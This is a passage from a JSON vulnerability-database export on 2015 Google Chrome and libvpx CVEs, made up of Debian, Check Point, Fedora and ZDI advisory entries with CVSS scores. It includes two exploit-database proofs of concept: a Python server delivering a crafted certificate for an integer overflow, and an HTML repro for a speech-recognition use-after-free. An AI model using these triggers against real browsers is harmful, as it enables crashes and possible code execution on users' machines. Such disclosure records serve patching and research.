"PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1251", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1251", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to bypass the Same Origin Policy via crafted JavaScript code that appends a child to a SCRIPT element, related to the insert and executeReparentTask functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1253", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1253", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1253", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Multiple use-after-free vulnerabilities in content/renderer/media/user_media_client_impl.cc in the WebRTC implementation in Google Chrome before 43.0.2357.65 allow remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that executes upon completion of a getUserMedia request.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1260", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1260"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1260", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1263", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1263", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1263", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "The ReduceTransitionElementsKind function in hydrogen-check-elimination.cc in Google V8 before 4.2.77.8, as used in Google Chrome before 42.0.2311.90, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that leverages \"type confusion\" in the check-elimination optimization.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1242", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1242"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1242", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1242", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in the OpenPDFInReaderView::Update function in browser/ui/views/location_bar/open_pdf_in_reader_view.cc in Google Chrome before 41.0.2272.76 might allow user-assisted remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by triggering interaction with a PDFium \"Open PDF in Reader\" button that has an invalid tab association.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1245", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1245"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1245", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1245", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "The SearchEngineTabHelper::OnPageHasOSDD function in browser/ui/search_engines/search_engine_tab_helper.cc in Google Chrome before 42.0.2311.90 does not prevent use of a file: URL for an OpenSearch descriptor XML document, which might allow remote attackers to obtain sensitive information from local files via a crafted (1) http or (2) https web site.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1247", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1247"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1247", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1247", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "The FileSystem API in Google Chrome before 40.0.2214.91 allows remote attackers to bypass the SafeBrowsing for Executable Files protection mechanism by creating a .exe file in a temporary filesystem and then referencing this file with a filesystem:http: URL.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1248", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1248"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1248", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1248", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "gpu/blink/webgraphicscontext3d_impl.cc in the WebGL implementation in Google Chrome before 42.0.2311.90 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted WebGL program that triggers a state inconsistency.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1240", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1240"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1240", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1240", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Blink, as used in Google Chrome before 42.0.2311.90, allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1246", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1246"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1246", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1246", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does not properly handle wraps, which allows remote attackers to bypass a sandbox protection mechanism or cause a denial of service (out-of-bounds write) via vectors that trigger a write operation with a large amount of data, related to the PartialCircularBuffer::Write and PartialCircularBuffer::DoWrite functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1252", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1252"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1252", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1252", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Google Chrome before 41.0.2272.118 does not properly handle the interaction of IPC, the Gamepad API, and Google V8, which allows remote attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2015-04-01T21:59:00", "type": "debiancve", "title": "CVE-2015-1233", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233"], "modified": "2015-04-01T21:59:00", "id": "DEBIANCVE:CVE-2015-1233", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1233", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Race condition in gpu/command_buffer/service/gles2_cmd_decoder.cc in Google Chrome before 41.0.2272.118 allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact by manipulating OpenGL ES commands.", "cvss3": {}, "published": "2015-04-01T21:59:00", "type": "debiancve", "title": "CVE-2015-1234", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1234"], "modified": "2015-04-01T21:59:00", "id": "DEBIANCVE:CVE-2015-1234", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1234", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Google Chrome before 42.0.2311.90 does not properly consider the interaction of page navigation with the handling of touch events and gesture events, which allows remote attackers to trigger unintended UI actions via a crafted web site that conducts a \"tapjacking\" attack.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1241", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1241"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1241", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1241", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in the RenderFrameImpl::OnMessageReceived function in content/renderer/render_frame_impl.cc in Google Chrome before 42.0.2311.90 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger renderer IPC messages during a detach operation.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1237", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1237"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1237", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1237", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Skia, as used in Google Chrome before 42.0.2311.90, allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1238", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1238"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1238", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1238", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:48:57", "description": "A use-after-free vulnerability exists in Google Chrome, blink component. The vulnerability is due to error when building a shadow tree for a element with a direct reference to a disallowed element. A remote attacker could exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation could result in code execution in the context of the currently logged in user.", "cvss3": {}, "published": "2015-07-15T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome blink buildShadowAndInstanceTree Use After Free (CVE-2015-1256)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2015-07-16T00:00:00", "id": "CPAI-2015-0850", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-05T23:35:18", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2015-08-15T00:00:00", "type": "zdt", "title": "Google Chrome 43.0 - Certificate MIME Handling Integer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1265"], "modified": "2015-08-15T00:00:00", "id": "1337DAY-ID-24047", "href": "https://0day.today/exploit/description/24047", "sourceData": "#! /usr/bin/python2\r\n \r\nimport socket\r\nimport sys\r\nimport time\r\n \r\nkHost = '127.0.0.1'\r\nkPort = 443\r\n \r\ndef bind_listen():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)\r\n s.bind((kHost, kPort))\r\n s.listen(1)\r\n return s\r\n \r\ndef send_certificate(c, r):\r\n print '[*] sending certificate'\r\n payload = ''\r\n with open('compressed', 'rb') as tmp:\r\n payload = tmp.read()\r\n c.send('HTTP/1.1 200 OK\\r\\n')\r\n c.send('Content-Type: application/x-x509-user-cert\\r\\n')\r\n c.send('Content-Encoding: gzip\\r\\n')\r\n c.send('Content-Length: {}\\r\\n'.format(len(payload)))\r\n c.send('\\r\\n')\r\n c.send(payload)\r\n \r\ndef main():\r\n print '[*] listening for connection on port {}:{}'.format(kHost, kPort)\r\n s = bind_listen()\r\n while True:\r\n c, (host, port) = s.accept()\r\n print '[*] connection from {}:{}'.format(host, port)\r\n while True:\r\n r = c.recv(1024)\r\n if 'favicon' in r:\r\n c.send('HTTP/1.1 404 Not Found\\r\\n\\r\\n')\r\n else:\r\n send_certificate(c, r)\r\n time.sleep(20)\r\n sys.exit(0)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n \r\nThanks,\r\nPaulos Yibelo\n\n# 0day.today [2018-03-05] #", "sourceHref": "https://0day.today/exploit/24047", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T21:03:26", "description": "A specially crafted web-page can cause the blink rendering engine used by Google Chrome and Chromium to continue to use a speech recognition API object after the memory block that contained the object has been freed. An attacker can force the code to read a pointer from the freed memory and use this to call a function, allowing arbitrary code execution. Google Chrome version 39.0 is affected.", "cvss3": {}, "published": "2016-11-24T00:00:00", "type": "zdt", "title": "Chrome Blink SpeechRecognitionController Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1251"], "modified": "2016-11-24T00:00:00", "id": "1337DAY-ID-26408", "href": "https://0day.today/exploit/description/26408", "sourceData": "Chrome blink SpeechRecognitionController use-after-free\r\n=======================================================\r\n(Chromium 455857, CVE-2015-1251)\r\n\r\nSynopsis\r\n--------\r\nA specially crafted web-page can cause the blink rendering engine used\r\nby Google Chrome and Chromium to continue to use a speech recognition\r\nAPI object after the memory block that contained the object has been\r\nfreed. An attacker can force the code to read a pointer from the freed\r\nmemory and use this to call a function, allowing arbitrary code execution.\r\n\r\nKnown affected software and attack vectors\r\n------------------------------------------\r\n+ Google Chrome 39.0\r\n\r\n An attacker would need to get a target user to open a specially\r\n crafted webpage. Disabling Javascript should prevent an attacker from\r\n triggering the vulnerable code path.\r\n\r\nDescription\r\n-----------\r\nCreating a `webkitSpeechRecognition` Javascript object in a popup window\r\nbefore closing the popup frees a C++ object used internally by the\r\nspeech recognition API code but leaves a dangling pointer to the freed\r\nmemory in another C++ object. When the `start()` Javascript method is\r\ncalled, this dangling pointer is used to try to read a function pointer\r\nfrom a virtual function table and call that function. An attacker has\r\nample time to groom the heap between the free and re-use in order to\r\ncontrol the function pointer used by the code, allowing arbitrary code\r\nexecution.\r\n\r\nExploit\r\n-------\r\nAn attacker looking to exploit this issue is going to want to try and\r\ncontrol the contents of the freed memory, before getting the code to use\r\nthe dangling pointer to call a virtual function. Doing so would allow an\r\nattacker to execute arbitrary code. This is made possible because steps\r\n5 and 6 can both be triggered at a time of the attackers choosing,\r\ngiving the attacker the ability to free the memory in step 5 whenever\r\nthis is convenient and attempt to reallocate and fill it with any data\r\nbefore executing step 6. This should allow an attacker to create a fake\r\n`vftable` pointer and gain arbitrary code execution. In order to develop\r\na working exploit, existing mitigations will need to be bypassed, most\r\nsignificantly ASLR and DEP. As this vulnerability by itself does not\r\nappear to allow bypassing these mitigations, I did not develop a working\r\nexploit for it.\r\n\r\nTime-line\r\n---------\r\n* November 2014: This vulnerability was found through fuzzing.\r\n* December 2014: This vulnerability was submitted to ZDI and iDefense.\r\n* January 2015: This vulnerability was acquired by ZDI.\r\n* February 2015: This vulnerability was fixed in revision 190993.\r\n* May 2015: This vulnerability was addressed by Google in\r\n Chrome 43.0.2357.65.\r\n* November 2016: Details of this issue are released.\r\n\r\nCheers,\r\n\r\nSkyLined\r\n\r\n\r\nRepro.html\r\n\r\n<html>\r\n <head>\r\n <script>\r\n oAWindow = window.open();\r\n oAWebkitASpeechARecognition = new oAWindow.webkitASpeechARecognition();\r\n oAWindow.close();\r\n setAInterval(function(){\r\n if (oAWindow.closed) {\r\n oAWebkitASpeechARecognition.start();\r\n }\r\n }, 10);\r\n </script>\r\n </head>\r\n</html>\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26408", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-19T03:13:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\r The specific flaw exists within SpeechRecognitionClient. By manipulating a document's elements, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.\n\nThis is private exploit. You can buy it at https://0day.today", "cvss3": {}, "published": "2015-05-24T00:00:00", "type": "zdt", "title": "Google Chrome SpeechRecognitionClient Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-24T00:00:00", "id": "1337DAY-ID-23663", "href": "https://0day.today/exploit/description/23663", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "libvpx provides the VP8 SDK, which allows you to integrate your applications with the VP8 video codec, a high quality, royalty free, open source codec deployed on millions of computers and devices worldwide. ", "cvss3": {}, "published": "2015-09-20T15:26:23", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: libvpx-1.4.0-5.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-09-20T15:26:23", "id": "FEDORA:8A9B7608B7FE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LL2IVVSQUWYX6JPENN6XFFF2342Y2MDI/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "libvpx provides the VP8 SDK, which allows you to integrate your applications with the VP8 video codec, a high quality, royalty free, open source codec deployed on millions of computers and devices worldwide. ", "cvss3": {}, "published": "2015-09-24T08:32:37", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: libvpx-1.3.0-7.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-09-24T08:32:37", "id": "FEDORA:C19BF612F03E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NSXAG5CUJD7D24FU55SGH57244FWP72H/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "libvpx provides the VP8 SDK, which allows you to integrate your applications with the VP8 video codec, a high quality, royalty free, open source codec deployed on millions of computers and devices worldwide. ", "cvss3": {}, "published": "2015-10-05T22:55:46", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: libvpx-1.3.0-7.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-10-05T22:55:46", "id": "FEDORA:4F29E60478E0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KUZQFA4MIHA4LGVPNQFQ7VQHMHMZBR5U/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T21:13:11", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within SpeechRecognitionClient. By manipulating a document's elements, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "zdi", "title": "Google Chrome SpeechRecognitionClient Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 